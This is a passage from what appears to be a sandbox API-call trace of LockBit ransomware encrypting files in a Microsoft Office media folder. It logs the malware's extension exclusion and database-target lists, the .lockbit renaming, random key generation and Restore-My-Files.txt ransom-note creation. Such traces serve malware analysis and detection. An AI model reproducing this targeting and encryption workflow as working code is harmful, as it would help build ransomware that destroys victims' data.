returned 1 [0204.158] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.159] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.159] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.159] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.159] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21302_.GIF") returned 1 [0204.159] lstrcmpiW (lpString1="ntldr", lpString2="BD21302_.GIF") returned 1 [0204.159] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21302_.GIF") returned 1 [0204.159] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21302_.GIF") returned 1 [0204.159] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21302_.GIF") returned -1 [0204.159] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21302_.GIF") returned 1 [0204.159] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21302_.GIF") returned 1 [0204.159] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.159] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF") returned=".GIF" [0204.159] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.159] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.160] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.160] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.160] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF.lockbit") returned 78 [0204.160] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21302_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.167] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.167] malloc (_Size=0x40068) returned 0x3df0008 [0204.167] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=285) returned 1 [0204.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.168] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.171] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.171] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.172] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.172] free (_Block=0x1fa2ed8) [0204.172] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.172] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.172] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.172] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cf3a400, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4cf3a400, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21304_.GIF", cAlternateFileName="")) returned 1 [0204.176] lstrcmpiW (lpString1=".", lpString2="BD21304_.GIF") returned -1 [0204.176] lstrcmpiW (lpString1="..", lpString2="BD21304_.GIF") returned -1 [0204.176] PathFindExtensionW (pszPath="BD21304_.GIF") returned=".GIF" [0204.176] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.176] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.176] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.176] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.176] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.176] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.176] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.177] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.177] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.177] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.177] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.177] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.177] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.178] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.178] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.178] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.178] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.178] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21304_.GIF") returned 1 [0204.178] lstrcmpiW (lpString1="ntldr", lpString2="BD21304_.GIF") returned 1 [0204.178] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21304_.GIF") returned 1 [0204.178] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21304_.GIF") returned 1 [0204.178] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21304_.GIF") returned -1 [0204.178] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21304_.GIF") returned 1 [0204.178] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21304_.GIF") returned 1 [0204.178] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.178] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF") returned=".GIF" [0204.178] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.179] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.179] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.180] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF.lockbit") returned 78 [0204.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21304_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.181] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.181] malloc (_Size=0x40068) returned 0x3df0008 [0204.181] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=591) returned 1 [0204.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.182] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.185] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.185] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.185] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.185] free (_Block=0x1fa2ed8) [0204.185] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.185] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.185] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.185] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc27700, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4bc27700, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21306_.GIF", cAlternateFileName="")) returned 1 [0204.185] lstrcmpiW (lpString1=".", lpString2="BD21306_.GIF") returned -1 [0204.185] lstrcmpiW (lpString1="..", lpString2="BD21306_.GIF") returned -1 [0204.185] PathFindExtensionW (pszPath="BD21306_.GIF") returned=".GIF" [0204.185] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.185] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.185] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.185] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.185] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.186] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.186] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21306_.GIF") returned 1 [0204.187] lstrcmpiW (lpString1="ntldr", lpString2="BD21306_.GIF") returned 1 [0204.187] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21306_.GIF") returned 1 [0204.187] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21306_.GIF") returned 1 [0204.187] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21306_.GIF") returned -1 [0204.187] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21306_.GIF") returned 1 [0204.187] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21306_.GIF") returned 1 [0204.187] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.187] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF") returned=".GIF" [0204.187] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.187] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.187] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.188] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.188] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF.lockbit") returned 78 [0204.188] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21306_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.189] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.190] malloc (_Size=0x40068) returned 0x3df0008 [0204.190] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=591) returned 1 [0204.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.190] GetProcAddress (hModule=0x753f0000, 